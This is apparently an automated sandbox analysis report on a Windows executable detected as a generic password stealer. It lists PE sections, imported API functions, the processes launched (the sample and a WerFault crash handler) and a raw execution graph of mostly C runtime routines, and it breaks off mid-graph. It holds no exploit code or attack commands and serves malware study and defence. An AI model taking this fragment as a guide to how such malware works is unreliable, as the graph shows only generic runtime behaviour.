IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x1a0d00x1a200False0.4765998803827751data6.254058720378555IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x1c0000x74240x7600False0.4095272775423729Matlab v4 mat-file (little endian) , numeric, rows 0, columns 43091484.9666568554916495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x240000x258c0xa00False0.16171875data2.098226797581286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg0x270000x80x200False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.voltbl0x280000x220x200False0.091796875data0.6504699138522845
.rsrc0x290000x1a80x200False0.486328125data4.183569951400347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x2a0000x14c40x1600False0.7718394886363636data6.426785687436811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountry
RT_MANIFEST0x290600x143XML 1.0 document, ASCII textEnglishUnited States
DLLImport
SHLWAPI.dllGetMenuPosFromID, PathRemoveExtensionA, SHRegQueryUSValueW, StrRChrW, UrlEscapeA
ole32.dllCreateClassMoniker, EnableHookObject, HMETAFILE_UserUnmarshal, OleInitialize, StgCreateStorageEx, WriteStringStream
MSWSOCK.dllGetTypeByNameW, TransmitFile, getnetbyname
WINMM.dlljoyGetNumDevs, midiStreamPosition, midiStreamRestart, mixerClose, mixerGetLineControlsW
pdh.dllPdhConnectMachineA, PdhGetDefaultPerfCounterA, PdhRemoveCounter, PdhVbGetCounterPathElements, PdhVbGetOneCounterPath, PdhVbOpenQuery
OLEAUT32.dllOleLoadPictureEx, VARIANT_UserMarshal, VarDateFromCy, VarR8Pow, VarUI2FromDate
CRYPT32.dllCertDuplicateStore, CertFindRDNAttr, CertFreeCertificateContext, CryptMsgCountersign
RPCRT4.dllNdrByteCountPointerBufferSize, NdrClientInitializeNew, NdrUserMarshalUnmarshall, RpcBindingInqAuthInfoW, RpcBindingSetOption, RpcMgmtEnableIdleCleanup, RpcMgmtInqComTimeout
KERNEL32.dllCloseHandle, CreateEventW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemCodePagesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GlobalAlloc, GlobalLock, GlobalReAlloc, GlobalSize, GlobalUnlock, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MulDiv, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, WaitForMultipleObjects, WideCharToMultiByte, WriteConsoleW, WriteFile, lstrcmpW, lstrcpyW, lstrlenW
USER32.dllAdjustWindowRect, BeginPaint, CharLowerBuffW, CharUpperBuffW, ClientToScreen, CloseClipboard, CreateCaret, CreateMenu, CreatePopupMenu, CreateWindowExW, DefWindowProcW, DestroyCaret, DispatchMessageW, EmptyClipboard, EnableMenuItem, EndPaint, FillRect, GetCapture, GetClientRect, GetClipboardData, GetDC, GetDlgItem, GetDpiForSystem, GetFocus, GetKeyboardState, GetParent, GetSystemMenu, GetSystemMetrics, GetWindowLongW, HideCaret, InsertMenuW, InvalidateRect, InvertRect, IsClipboardFormatAvailable, IsWindowVisible, LoadCursorW, LoadIconW, LoadStringW, MapVirtualKeyW, MsgWaitForMultipleObjects, OpenClipboard, PeekMessageW, PostMessageW, PostQuitMessage, RegisterClassW, ReleaseCapture, ReleaseDC, ScrollWindow, SetCapture, SetCaretPos, SetClipboardData, SetRect, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongW, SetWindowPos, SetWindowTextW, ShowCaret, ShowScrollBar, ShowWindow, SystemParametersInfoW, ToUnicode, TrackPopupMenu, UpdateWindow, VkKeyScanW, wsprintfW
GDI32.dllBitBlt, CreateBitmap, CreateCompatibleBitmap, CreateCompatibleDC, CreateFontIndirectW, CreateSolidBrush, DeleteObject, EnumFontFamiliesExW, GetStockObject, GetTextFaceW, GetTextMetricsW, LineTo, MoveToEx, SelectObject, SetBkColor, SetTextColor, TextOutW, TranslateCharsetInfo
COMCTL32.dll
ADVAPI32.dllRegCloseKey, RegCreateKeyW, RegSetValueExW
Language of compilation systemCountry where language is spokenMap
EnglishUnited States
No network behavior found

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:16:56:09
Start date:29/11/2022
Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Imagebase:0x1a0000
File size:147968 bytes
MD5 hash:C852376DDA1DE89231D5F558255775E0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Target ID:2
Start time:16:56:10
Start date:29/11/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464
Imagebase:0x2b0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Reset < >

    Execution Graph

    Execution Coverage:1.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:8.1%
    Total number of Nodes:1382
    Total number of Limit Nodes:17
    execution_graph 11050 1b0b35 11063 1b5ae0 GetEnvironmentStringsW 11050->11063 11052 1b0b46 11053 1b0b58 11052->11053 11054 1b0b4c 11052->11054 11070 1b0bee 11053->11070 11055 1b36c3 ___free_lconv_mon 14 API calls 11054->11055 11057 1b0b52 11055->11057 11059 1b36c3 ___free_lconv_mon 14 API calls 11060 1b0b7c 11059->11060 11061 1b36c3 ___free_lconv_mon 14 API calls 11060->11061 11062 1b0b82 11061->11062 11064 1b5aef 11063->11064 11065 1b5af1 11063->11065 11064->11052 11066 1b48ce 15 API calls 11065->11066 11067 1b5b06 CatchIt 11066->11067 11068 1b36c3 ___free_lconv_mon 14 API calls 11067->11068 11069 1b5b20 FreeEnvironmentStringsW 11068->11069 11069->11052 11073 1b0c0d 11070->11073 11071 1b4871 _unexpected 14 API calls 11072 1b0c4d 11071->11072 11074 1b0c55 11072->11074 11083 1b0c5f 11072->11083 11073->11071 11073->11073 11075 1b36c3 ___free_lconv_mon 14 API calls 11074->11075 11091 1b0b5f 11075->11091 11076 1b0cd4 11077 1b36c3 ___free_lconv_mon 14 API calls 11076->11077 11077->11091 11078 1b4871 _unexpected 14 API calls 11078->11083 11079 1b0ce4 11101 1b0bbf 11079->11101 11083->11076 11083->11078 11083->11079 11085 1b0cff 11083->11085 11088 1b36c3 ___free_lconv_mon 14 API calls 11083->11088 11092 1b491c 11083->11092 11084 1b36c3 ___free_lconv_mon 14 API calls 11086 1b0cf2 11084->11086 11087 1b37a6 ___std_exception_copy 11 API calls 11085->11087 11089 1b36c3 ___free_lconv_mon 14 API calls 11086->11089 11090 1b0d0b 11087->11090 11088->11083 11089->11091 11091->11059 11093 1b492a 11092->11093 11094 1b4938 11092->11094 11093->11094 11099 1b4952 11093->11099 11095 1b47e4 ___free_lconv_mon 14 API calls 11094->11095 11096 1b4942 11095->11096 11097 1b3796 ___std_exception_copy 29 API calls 11096->11097 11098 1b494c 11097->11098 11098->11083 11099->11098 11100 1b47e4 ___free_lconv_mon 14 API calls 11099->11100 11100->11096 11102 1b0be9 11101->11102 11103 1b0bcc 11101->11103 11102->11084 11104 1b0be3 11103->11104 11105 1b36c3 ___free_lconv_mon 14 API calls 11103->11105 11106 1b36c3 ___free_lconv_mon 14 API calls 11104->11106 11105->11103 11106->11102 12487 1b032d 12490 1b0354 12487->12490 12491 1b0360 __FrameHandler3::FrameUnwindToState 12490->12491 12498 1b255d EnterCriticalSection 12491->12498 12493 1b036a 12494 1b0398 12493->12494 12496 1b4fd0 ___scrt_uninitialize_crt 14 API calls 12493->12496 12499 1b03b6 12494->12499 12496->12493 12498->12493 12502 1b2574 LeaveCriticalSection 12499->12502 12501 1b0352 12502->12501 12583 1ad357 12586 1b07ec 12583->12586 12589 1b077b 12586->12589 12592 1b09de 12589->12592 12593 1b09ea __FrameHandler3::FrameUnwindToState 12592->12593 12600 1b255d EnterCriticalSection 12593->12600 12595 1b09f8 12601 1b0802 12595->12601 12597 1b0a05 12611 1b0a2d 12597->12611 12600->12595 12603 1b081d 12601->12603 12604 1b0890 _unexpected 12601->12604 12602 1b0870 12602->12604 12606 1b593f 32 API calls 12602->12606 12603->12602 12603->12604 12605 1b593f 32 API calls 12603->12605 12604->12597 12607 1b0866 12605->12607 12608 1b0886 12606->12608 12609 1b36c3 ___free_lconv_mon 14 API calls 12607->12609 12610 1b36c3 ___free_lconv_mon 14 API calls 12608->12610 12609->12602 12610->12604 12614 1b2574 LeaveCriticalSection 12611->12614 12613 1ad35f 12614->12613 12634 1b4141 12635 1b3d9d ___scrt_uninitialize_crt 79 API calls 12634->12635 12636 1b4149 12635->12636 12644 1b70f1 12636->12644 12638 1b414e 12654 1b719c 12638->12654 12641 1b4178 12642 1b36c3 ___free_lconv_mon 14 API calls 12641->12642 12643 1b4183 12642->12643 12645 1b70fd __FrameHandler3::FrameUnwindToState 12644->12645 12658 1b255d EnterCriticalSection 12645->12658 12647 1b7174 12663 1b7193 12647->12663 12649 1b7108 12649->12647 12651 1b7148 DeleteCriticalSection 12649->12651 12659 1b8ae6 12649->12659 12652 1b36c3 ___free_lconv_mon 14 API calls 12651->12652 12652->12649 12655 1b71b3 12654->12655 12657 1b415d DeleteCriticalSection 12654->12657 12656 1b36c3 ___free_lconv_mon 14 API calls 12655->12656 12655->12657 12656->12657 12657->12638 12657->12641 12658->12649 12660 1b8af9 ___std_exception_copy 12659->12660 12666 1b8ba4 12660->12666 12662 1b8b05 ___std_exception_copy 12662->12649 12738 1b2574 LeaveCriticalSection 12663->12738 12665 1b7180 12665->12638 12667 1b8bb0 __FrameHandler3::FrameUnwindToState 12666->12667 12668 1b8bba 12667->12668 12669 1b8bdd 12667->12669 12670 1b3922 ___std_exception_copy 29 API calls 12668->12670 12671 1b8bd5 12669->12671 12677 1b4051 EnterCriticalSection 12669->12677 12670->12671 12671->12662 12673 1b8bfb 12678 1b8b16 12673->12678 12675 1b8c08 12692 1b8c33 12675->12692 12677->12673 12679 1b8b23 12678->12679 12680 1b8b46 12678->12680 12681 1b3922 ___std_exception_copy 29 API calls 12679->12681 12682 1b8b3e 12680->12682 12683 1b3e0b ___scrt_uninitialize_crt 75 API calls 12680->12683 12681->12682 12682->12675 12684 1b8b5e 12683->12684 12685 1b719c 14 API calls 12684->12685 12686 1b8b66 12685->12686 12687 1b6614 ___scrt_uninitialize_crt 29 API calls 12686->12687 12688 1b8b72 12687->12688 12695 1b9098 12688->12695 12691 1b36c3 ___free_lconv_mon 14 API calls 12691->12682 12737 1b4065 LeaveCriticalSection 12692->12737 12694 1b8c39 12694->12671 12696 1b90c1 12695->12696 12701 1b8b79 12695->12701 12697 1b9110 12696->12697 12699 1b90e8 12696->12699 12698 1b3922 ___std_exception_copy 29 API calls 12697->12698 12698->12701 12702 1b913b 12699->12702 12701->12682 12701->12691 12703 1b9147 __FrameHandler3::FrameUnwindToState 12702->12703 12710 1b5dae EnterCriticalSection 12703->12710 12705 1b9155 12707 1b9186 12705->12707 12711 1b8ff8 12705->12711 12724 1b91c0 12707->12724 12710->12705 12712 1b5b65 ___scrt_uninitialize_crt 29 API calls 12711->12712 12715 1b9008 12712->12715 12713 1b900e 12727 1b5bcf 12713->12727 12715->12713 12716 1b5b65 ___scrt_uninitialize_crt 29 API calls 12715->12716 12723 1b9040 12715->12723 12718 1b9037 12716->12718 12717 1b5b65 ___scrt_uninitialize_crt 29 API calls 12719 1b904c CloseHandle 12717->12719 12720 1b5b65 ___scrt_uninitialize_crt 29 API calls 12718->12720 12719->12713 12721 1b9058 GetLastError 12719->12721 12720->12723 12721->12713 12722 1b9066 ___scrt_uninitialize_crt 12722->12707 12723->12713 12723->12717 12736 1b5dd1 LeaveCriticalSection 12724->12736 12726 1b91a9 12726->12701 12728 1b5bde 12727->12728 12729 1b5c45 12727->12729 12728->12729 12734 1b5c08 12728->12734 12730 1b47e4 ___free_lconv_mon 14 API calls 12729->12730 12731 1b5c4a 12730->12731 12732 1b47f7 ___scrt_uninitialize_crt 14 API calls 12731->12732 12733 1b5c35 12732->12733 12733->12722 12734->12733 12735 1b5c2f SetStdHandle 12734->12735 12735->12733 12736->12726 12737->12694 12738->12665 11296 1b2e6f 11301 1b26a7 11296->11301 11302 1b26b8 11301->11302 11303 1b26b2 11301->11303 11305 1b220e _unexpected 6 API calls 11302->11305 11323 1b26be 11302->11323 11304 1b21cf _unexpected 6 API calls 11303->11304 11304->11302 11306 1b26d2 11305->11306 11307 1b4871 _unexpected 14 API calls 11306->11307 11306->11323 11309 1b26e2 11307->11309 11308 1b1bdc __FrameHandler3::FrameUnwindToState 50 API calls 11310 1b273c 11308->11310 11311 1b26ea 11309->11311 11312 1b26ff 11309->11312 11313 1b220e _unexpected 6 API calls 11311->11313 11314 1b220e _unexpected 6 API calls 11312->11314 11315 1b26f6 11313->11315 11316 1b270b 11314->11316 11320 1b36c3 ___free_lconv_mon 14 API calls 11315->11320 11317 1b270f 11316->11317 11318 1b271e 11316->11318 11321 1b220e _unexpected 6 API calls 11317->11321 11319 1b28fd _unexpected 14 API calls 11318->11319 11322 1b2729 11319->11322 11320->11323 11321->11315 11324 1b36c3 ___free_lconv_mon 14 API calls 11322->11324 11323->11308 11325 1b26c3 11323->11325 11324->11325 11326 1b32b4 11325->11326 11327 1b32de 11326->11327 11348 1b3140 11327->11348 11330 1b2ea9 11331 1b48ce 15 API calls 11332 1b3308 11331->11332 11333 1b331e 11332->11333 11334 1b3310 11332->11334 11355 1b2f38 11333->11355 11335 1b36c3 ___free_lconv_mon 14 API calls 11334->11335 11335->11330 11338 1b3356 11339 1b47e4 ___free_lconv_mon 14 API calls 11338->11339 11340 1b335b 11339->11340 11342 1b36c3 ___free_lconv_mon 14 API calls 11340->11342 11341 1b3371 11343 1b36c3 ___free_lconv_mon 14 API calls 11341->11343 11346 1b339d 11341->11346 11342->11330 11343->11346 11345 1b36c3 ___free_lconv_mon 14 API calls 11345->11330 11347 1b33e6 11346->11347 11366 1b3676 11346->11366 11347->11345 11374 1b2eb6 11348->11374 11351 1b3173 11353 1b318a 11351->11353 11354 1b3178 GetACP 11351->11354 11352 1b3161 GetOEMCP 11352->11353 11353->11330 11353->11331 11354->11353 11356 1b3140 52 API calls 11355->11356 11357 1b2f58 11356->11357 11359 1b2f95 IsValidCodePage 11357->11359 11363 1b2fd1 __FrameHandler3::FrameUnwindToState 11357->11363 11358 1adb25 CatchGuardHandler 5 API calls 11360 1b313e 11358->11360 11361 1b2fa7 11359->11361 11359->11363 11360->11338 11360->11341 11362 1b2fd6 GetCPInfo 11361->11362 11365 1b2fb0 __FrameHandler3::FrameUnwindToState 11361->11365 11362->11363 11362->11365 11363->11358 11415 1b34ca 11365->11415 11367 1b3682 __FrameHandler3::FrameUnwindToState 11366->11367 11499 1b255d EnterCriticalSection 11367->11499 11369 1b368c 11500 1b3409 11369->11500 11375 1b2ed4 11374->11375 11376 1b2ecd 11374->11376 11375->11376 11377 1b25ec _unexpected 50 API calls 11375->11377 11376->11351 11376->11352 11378 1b2ef5 11377->11378 11382 1b5e8c 11378->11382 11383 1b5e9f 11382->11383 11384 1b2f0b 11382->11384 11383->11384 11390 1b4f4f 11383->11390 11386 1b5eb9 11384->11386 11387 1b5ecc 11386->11387 11388 1b5ee1 11386->11388 11387->11388 11412 1b2e5b 11387->11412 11388->11376 11391 1b4f5b __FrameHandler3::FrameUnwindToState 11390->11391 11392 1b25ec _unexpected 50 API calls 11391->11392 11393 1b4f64 11392->11393 11400 1b4faa 11393->11400 11403 1b255d EnterCriticalSection 11393->11403 11395 1b4f82 11404 1b4fd0 11395->11404 11400->11384 11401 1b1bdc __FrameHandler3::FrameUnwindToState 50 API calls 11402 1b4fcf 11401->11402 11403->11395 11405 1b4f93 11404->11405 11406 1b4fde _unexpected 11404->11406 11408 1b4faf 11405->11408 11406->11405 11407 1b4d84 _unexpected 14 API calls 11406->11407 11407->11405 11411 1b2574 LeaveCriticalSection 11408->11411 11410 1b4fa6 11410->11400 11410->11401 11411->11410 11413 1b25ec _unexpected 50 API calls 11412->11413 11414 1b2e60 11413->11414 11414->11388 11416 1b34f2 GetCPInfo 11415->11416 11417 1b35bb 11415->11417 11416->11417 11423 1b350a 11416->11423 11418 1adb25 CatchGuardHandler 5 API calls 11417->11418 11420 1b3674 11418->11420 11420->11363 11426 1b4b01 11423->11426 11425 1b62af 54 API calls 11425->11417 11427 1b2eb6 50 API calls 11426->11427 11428 1b4b21 11427->11428 11446 1b4c0a 11428->11446 11430 1b4b4e 11431 1b4bdd 11430->11431 11434 1b48ce 15 API calls 11430->11434 11436 1b4be5 11430->11436 11437 1b4b73 __FrameHandler3::FrameUnwindToState 11430->11437 11449 1b4ae1 11431->11449 11432 1adb25 CatchGuardHandler 5 API calls 11435 1b3572 11432->11435 11434->11437 11441 1b62af 11435->11441 11436->11432 11437->11431 11438 1b4c0a ___scrt_uninitialize_crt MultiByteToWideChar 11437->11438 11439 1b4bbe 11438->11439 11439->11431 11440 1b4bc9 GetStringTypeW 11439->11440 11440->11431 11442 1b2eb6 50 API calls 11441->11442 11443 1b62c2 11442->11443 11453 1b62f8 11443->11453 11447 1b4c1b MultiByteToWideChar 11446->11447 11447->11430 11450 1b4aed 11449->11450 11452 1b4afe 11449->11452 11451 1b36c3 ___free_lconv_mon 14 API calls 11450->11451 11450->11452 11451->11452 11452->11436 11454 1b6313 11453->11454 11455 1b4c0a ___scrt_uninitialize_crt MultiByteToWideChar 11454->11455 11458 1b6359 11455->11458 11456 1b64d1 11457 1adb25 CatchGuardHandler 5 API calls 11456->11457 11459 1b3593 11457->11459 11458->11456 11460 1b48ce 15 API calls 11458->11460 11462 1b637f 11458->11462 11469 1b6405 11458->11469 11459->11425 11460->11462 11461 1b4ae1 __freea 14 API calls 11461->11456 11463 1b4c0a ___scrt_uninitialize_crt MultiByteToWideChar 11462->11463 11462->11469 11464 1b63c4 11463->11464 11464->11469 11481 1b229b 11464->11481 11467 1b642e 11470 1b64b9 11467->11470 11471 1b48ce 15 API calls 11467->11471 11474 1b6440 11467->11474 11468 1b63f6 11468->11469 11473 1b229b 6 API calls 11468->11473 11469->11461 11472 1b4ae1 __freea 14 API calls 11470->11472 11471->11474 11472->11469 11473->11469 11474->11470 11475 1b229b 6 API calls 11474->11475 11476 1b6483 11475->11476 11476->11470 11487 1b5a29 11476->11487 11478 1b649d 11478->11470 11479 1b64a6 11478->11479 11480 1b4ae1 __freea 14 API calls 11479->11480 11480->11469 11490 1b24b7 11481->11490 11485 1b22ec LCMapStringW 11486 1b22ac 11485->11486 11486->11467 11486->11468 11486->11469 11488 1b5a40 WideCharToMultiByte 11487->11488 11488->11478 11491 1b2434 _unexpected 5 API calls 11490->11491 11492 1b22a6 11491->11492 11492->11486 11493 1b22f8 11492->11493 11496 1b24d1 11493->11496 11495 1b2303 11495->11485 11497 1b2434 _unexpected 5 API calls 11496->11497 11498 1b24e7 11497->11498 11498->11495 11499->11369 11510 1b2dda 11500->11510 11502 1b342b 11503 1b2dda 29 API calls 11502->11503 11505 1b344a 11503->11505 11504 1b3471 11507 1b36b7 11504->11507 11505->11504 11506 1b36c3 ___free_lconv_mon 14 API calls 11505->11506 11506->11504 11524 1b2574 LeaveCriticalSection 11507->11524 11509 1b36a5 11509->11347 11511 1b2deb 11510->11511 11518 1b2de7 CatchIt 11510->11518 11512 1b2df2 11511->11512 11516 1b2e05 __FrameHandler3::FrameUnwindToState 11511->11516 11513 1b47e4 ___free_lconv_mon 14 API calls 11512->11513 11514 1b2df7 11513->11514 11515 1b3796 ___std_exception_copy 29 API calls 11514->11515 11515->11518 11517 1b2e33 11516->11517 11516->11518 11520 1b2e3c 11516->11520 11519 1b47e4 ___free_lconv_mon 14 API calls 11517->11519 11518->11502 11521 1b2e38 11519->11521 11520->11518 11522 1b47e4 ___free_lconv_mon 14 API calls 11520->11522 11523 1b3796 ___std_exception_copy 29 API calls 11521->11523 11522->11521 11523->11518 11524->11509 9804 1ad19e 9809 1ad720 SetUnhandledExceptionFilter 9804->9809 9806 1ad1a3 9810 1b0f04 9806->9810 9808 1ad1ae 9809->9806 9811 1b0f2a 9810->9811 9812 1b0f10 9810->9812 9811->9808 9812->9811 9817 1b47e4 9812->9817 9823 1b273d GetLastError 9817->9823 9819 1b0f1a 9820 1b3796 9819->9820 10044 1b39c8 9820->10044 9822 1b0f25 9822->9808 9824 1b2759 9823->9824 9825 1b2753 9823->9825 9844 1b275d SetLastError 9824->9844 9851 1b220e 9824->9851 9846 1b21cf 9825->9846 9832 1b27a3 9835 1b220e _unexpected 6 API calls 9832->9835 9833 1b2792 9834 1b220e _unexpected 6 API calls 9833->9834 9836 1b27a0 9834->9836 9837 1b27af 9835->9837 9863 1b36c3 9836->9863 9838 1b27ca 9837->9838 9839 1b27b3 9837->9839 9869 1b28fd 9838->9869 9840 1b220e _unexpected 6 API calls 9839->9840 9840->9836 9844->9819 9845 1b36c3 ___free_lconv_mon 12 API calls 9845->9844 9874 1b2434 9846->9874 9848 1b21eb 9849 1b2206 TlsGetValue 9848->9849 9850 1b21f4 9848->9850 9850->9824 9852 1b2434 _unexpected 5 API calls 9851->9852 9853 1b222a 9852->9853 9854 1b2248 TlsSetValue 9853->9854 9855 1b2233 9853->9855 9855->9844 9856 1b4871 9855->9856 9861 1b487e _unexpected 9856->9861 9857 1b48be 9860 1b47e4 ___free_lconv_mon 13 API calls 9857->9860 9858 1b48a9 RtlAllocateHeap 9859 1b278a 9858->9859 9858->9861 9859->9832 9859->9833 9860->9859 9861->9857 9861->9858 9888 1b39ff 9861->9888 9864 1b36f8 9863->9864 9865 1b36ce HeapFree 9863->9865 9864->9844 9865->9864 9866 1b36e3 GetLastError 9865->9866 9867 1b36f0 ___free_lconv_mon 9866->9867 9868 1b47e4 ___free_lconv_mon 12 API calls 9867->9868 9868->9864 9902 1b2a63 9869->9902 9875 1b2462 9874->9875 9879 1b245e _unexpected 9874->9879 9875->9879 9880 1b2369 9875->9880 9878 1b247c GetProcAddress 9878->9879 9879->9848 9886 1b237a ___vcrt_FlsGetValue 9880->9886 9881 1b2410 9881->9878 9881->9879 9882 1b2398 LoadLibraryExW 9883 1b23b3 GetLastError 9882->9883 9884 1b2417 9882->9884 9883->9886 9884->9881 9885 1b2429 FreeLibrary 9884->9885 9885->9881 9886->9881 9886->9882 9887 1b23e6 LoadLibraryExW 9886->9887 9887->9884 9887->9886 9891 1b3a3b 9888->9891 9892 1b3a47 __FrameHandler3::FrameUnwindToState 9891->9892 9897 1b255d EnterCriticalSection 9892->9897 9894 1b3a52 9898 1b3a8e 9894->9898 9897->9894 9901 1b2574 LeaveCriticalSection 9898->9901 9900 1b3a0a 9900->9861 9901->9900 9903 1b2a6f __FrameHandler3::FrameUnwindToState 9902->9903 9916 1b255d EnterCriticalSection 9903->9916 9905 1b2a79 9917 1b2aa9 9905->9917 9908 1b2ab5 9909 1b2ac1 __FrameHandler3::FrameUnwindToState 9908->9909 9921 1b255d EnterCriticalSection 9909->9921 9911 1b2acb 9922 1b28b2 9911->9922 9913 1b2ae3 9926 1b2b03 9913->9926 9916->9905 9920 1b2574 LeaveCriticalSection 9917->9920 9919 1b296b 9919->9908 9920->9919 9921->9911 9923 1b28e8 _unexpected 9922->9923 9924 1b28c1 _unexpected 9922->9924 9923->9913 9924->9923 9929 1b4d84 9924->9929 10043 1b2574 LeaveCriticalSection 9926->10043 9928 1b27d5 9928->9845 9930 1b4e04 9929->9930 9936 1b4d9a 9929->9936 9931 1b4e52 9930->9931 9933 1b36c3 ___free_lconv_mon 14 API calls 9930->9933 9997 1b4f1e 9931->9997 9934 1b4e26 9933->9934 9937 1b36c3 ___free_lconv_mon 14 API calls 9934->9937 9935 1b4dcd 9938 1b4def 9935->9938 9944 1b36c3 ___free_lconv_mon 14 API calls 9935->9944 9936->9930 9936->9935 9939 1b36c3 ___free_lconv_mon 14 API calls 9936->9939 9940 1b4e39 9937->9940 9941 1b36c3 ___free_lconv_mon 14 API calls 9938->9941 9942 1b4dc2 9939->9942 9943 1b36c3 ___free_lconv_mon 14 API calls 9940->9943 9945 1b4df9 9941->9945 9957 1b4574 9942->9957 9949 1b4e47 9943->9949 9950 1b4de4 9944->9950 9951 1b36c3 ___free_lconv_mon 14 API calls 9945->9951 9946 1b4ec0 9947 1b36c3 ___free_lconv_mon 14 API calls 9946->9947 9952 1b4ec6 9947->9952 9954 1b36c3 ___free_lconv_mon 14 API calls 9949->9954 9985 1b4672 9950->9985 9951->9930 9952->9923 9953 1b4e60 9953->9946 9956 1b36c3 14 API calls ___free_lconv_mon 9953->9956 9954->9931 9956->9953 9958 1b4585 9957->9958 9984 1b466e 9957->9984 9959 1b4596 9958->9959 9960 1b36c3 ___free_lconv_mon 14 API calls 9958->9960 9961 1b45a8 9959->9961 9962 1b36c3 ___free_lconv_mon 14 API calls 9959->9962 9960->9959 9963 1b45ba 9961->9963 9964 1b36c3 ___free_lconv_mon 14 API calls 9961->9964 9962->9961 9965 1b45cc 9963->9965 9966 1b36c3 ___free_lconv_mon 14 API calls 9963->9966 9964->9963 9967 1b45de 9965->9967 9968 1b36c3 ___free_lconv_mon 14 API calls 9965->9968 9966->9965 9969 1b45f0 9967->9969 9970 1b36c3 ___free_lconv_mon 14 API calls 9967->9970 9968->9967 9971 1b4602 9969->9971 9972 1b36c3 ___free_lconv_mon 14 API calls 9969->9972 9970->9969 9973 1b4614 9971->9973 9974 1b36c3 ___free_lconv_mon 14 API calls 9971->9974 9972->9971 9975 1b4626 9973->9975 9976 1b36c3 ___free_lconv_mon 14 API calls 9973->9976 9974->9973 9977 1b36c3 ___free_lconv_mon 14 API calls 9975->9977 9979 1b4638 9975->9979 9976->9975 9977->9979 9978 1b464a 9981 1b465c 9978->9981 9982 1b36c3 ___free_lconv_mon 14 API calls 9978->9982 9979->9978 9980 1b36c3 ___free_lconv_mon 14 API calls 9979->9980 9980->9978 9983 1b36c3 ___free_lconv_mon 14 API calls 9981->9983 9981->9984 9982->9981 9983->9984 9984->9935 9986 1b467f 9985->9986 9996 1b46d7 9985->9996 9987 1b468f 9986->9987 9988 1b36c3 ___free_lconv_mon 14 API calls 9986->9988 9989 1b46a1 9987->9989 9990 1b36c3 ___free_lconv_mon 14 API calls 9987->9990 9988->9987 9991 1b36c3 ___free_lconv_mon 14 API calls 9989->9991 9992 1b46b3 9989->9992 9990->9989 9991->9992 9993 1b36c3 ___free_lconv_mon 14 API calls 9992->9993 9994 1b46c5 9992->9994 9993->9994 9995 1b36c3 ___free_lconv_mon 14 API calls 9994->9995 9994->9996 9995->9996 9996->9938 9998 1b4f2b 9997->9998 9999 1b4f4a 9997->9999 9998->9999 10003 1b46db 9998->10003 9999->9953 10002 1b36c3 ___free_lconv_mon 14 API calls 10002->9999 10004 1b47b9 10003->10004 10005 1b46ec 10003->10005 10004->10002 10039 1b47bf 10005->10039 10008 1b47bf _unexpected 14 API calls 10009 1b46ff 10008->10009 10010 1b47bf _unexpected 14 API calls 10009->10010 10011 1b470a 10010->10011 10012 1b47bf _unexpected 14 API calls 10011->10012 10013 1b4715 10012->10013 10014 1b47bf _unexpected 14 API calls 10013->10014 10015 1b4723 10014->10015 10016 1b36c3 ___free_lconv_mon 14 API calls 10015->10016 10017 1b472e 10016->10017 10018 1b36c3 ___free_lconv_mon 14 API calls 10017->10018 10019 1b4739 10018->10019 10020 1b36c3 ___free_lconv_mon 14 API calls 10019->10020 10021 1b4744 10020->10021 10022 1b47bf _unexpected 14 API calls 10021->10022 10023 1b4752 10022->10023 10024 1b47bf _unexpected 14 API calls 10023->10024 10025 1b4760 10024->10025 10026 1b47bf _unexpected 14 API calls 10025->10026 10027 1b4771 10026->10027 10028 1b47bf _unexpected 14 API calls 10027->10028 10029 1b477f 10028->10029 10030 1b47bf _unexpected 14 API calls 10029->10030 10031 1b478d 10030->10031 10032 1b36c3 ___free_lconv_mon 14 API calls 10031->10032 10033 1b4798 10032->10033 10034 1b36c3 ___free_lconv_mon 14 API calls 10033->10034 10035 1b47a3 10034->10035 10036 1b36c3 ___free_lconv_mon 14 API calls 10035->10036 10037 1b47ae 10036->10037 10038 1b36c3 